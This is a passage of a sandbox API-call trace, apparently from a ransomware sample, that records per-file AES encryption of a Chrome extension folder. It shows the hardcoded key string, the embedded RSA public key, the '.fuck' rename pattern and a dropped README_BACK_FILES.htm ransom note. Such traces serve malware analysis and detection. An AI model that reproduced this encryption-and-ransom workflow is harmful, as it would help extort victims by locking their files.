pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.835] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.835] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7bac8) returned 1 [0258.836] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7bac8, dwCertEncodingType=0x1, pInfo=0x2e26a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26a68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c740) returned 1 [0258.836] CryptEncrypt (in: hKey=0x2e7c740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.836] CryptEncrypt (in: hKey=0x2e7c740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7bc60*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7bc60*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7bc60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7bc60*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.837] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xa6, lpOverlapped=0x0) returned 1 [0258.840] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xa6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xb0) returned 1 [0258.840] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0xb0, lpOverlapped=0x0) returned 1 [0258.840] CloseHandle (hObject=0x5d50) returned 1 [0258.840] CloseHandle (hObject=0x5d60) returned 1 [0258.840] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), bFailIfExists=0) returned 1 [0258.844] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png", dwFileAttributes=0x0) returned 1 [0258.844] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.gsg")) returned 1 [0258.845] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.fuck")) returned 1 [0258.846] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.846] CryptDestroyKey (hKey=0x2e7c700) returned 1 [0258.846] CryptReleaseContext (hProv=0x2e7b138, dwFlags=0x0) returned 1 [0258.846] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.846] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.846] GetLastError () returned 0x0 [0258.846] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png")) returned 0x20 [0258.846] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png", dwFileAttributes=0x80) returned 1 [0258.847] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.847] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.848] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg", dwFileAttributes=0x2) returned 1 [0258.849] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7b3e0) returned 1 [0258.851] CryptCreateHash (in: hProv=0x2e7b3e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.851] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.851] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.851] CryptDeriveKey (in: hProv=0x2e7b3e0, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7c3c0) returned 1 [0258.851] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.851] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.851] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7b138) returned 1 [0258.852] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b138, dwCertEncodingType=0x1, pInfo=0x2e26620*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26650*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26658*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7c640) returned 1 [0258.852] CryptEncrypt (in: hKey=0x2e7c640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.852] CryptEncrypt (in: hKey=0x2e7c640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7b820*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7b820*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.852] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7b820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7b820*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.853] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0xa0, lpOverlapped=0x0) returned 1 [0258.854] CryptEncrypt (in: hKey=0x2e7c3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xa0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0xb0) returned 1 [0258.854] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0xb0, lpOverlapped=0x0) returned 1 [0258.854] CloseHandle (hObject=0x5d60) returned 1 [0258.854] CloseHandle (hObject=0x5d50) returned 1 [0258.854] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), bFailIfExists=0) returned 1 [0258.858] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png", dwFileAttributes=0x0) returned 1 [0258.858] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.gsg")) returned 1 [0258.859] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png.fuck")) returned 1 [0258.860] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0258.860] CryptDestroyKey (hKey=0x2e7c3c0) returned 1 [0258.860] CryptReleaseContext (hProv=0x2e7b3e0, dwFlags=0x0) returned 1 [0258.860] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0258.860] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.861] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\readme_back_files.htm")) returned 0xffffffff [0258.861] AreFileApisANSI () returned 1 [0258.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0258.861] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.861] GetFileType (hFile=0x5d64) returned 0x1 [0258.862] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0258.863] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.863] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0258.863] GetLastError () returned 0x0 [0258.863] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json")) returned 0x20 [0258.864] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0258.864] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.865] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.866] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0258.866] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7bdf8) returned 1 [0258.868] CryptCreateHash (in: hProv=0x2e7bdf8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0258.868] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0258.868] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.868] CryptDeriveKey (in: hProv=0x2e7bdf8, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0258.869] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.869] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0258.869] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e7be80) returned 1 [0258.869] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7be80, dwCertEncodingType=0x1, pInfo=0x2e26b00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26b30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26b38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7c140) returned 1 [0258.869] CryptEncrypt (in: hKey=0x2e7c140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0258.869] CryptEncrypt (in: hKey=0x2e7c140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7af18*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e7af18*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0258.869] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e7af18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e7af18*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0258.870] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.872] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.872] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.877] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1aa, lpOverlapped=0x0) returned 1 [0258.877] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1aa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1b0) returned 1 [0258.877] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x1b0, lpOverlapped=0x0) returned 1 [0258.877] CloseHandle (hObject=0x5d64) returned 1 [0258.878] CloseHandle (hObject=0x5d50) returned 1 [0258.878] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), bFailIfExists=0) returned 1 [0258.881] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0258.881] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.gsg")) returned 1 [0258.883] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\manifest.json.fuck")) returned 1 [0258.885] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.885] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0258.885] CryptReleaseContext (hProv=0x2e7bdf8, dwFlags=0x0) returned 1 [0258.885] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.885] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0258.893] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.893] FindNextFileA (in: hFindFile=0x2e7fc00, 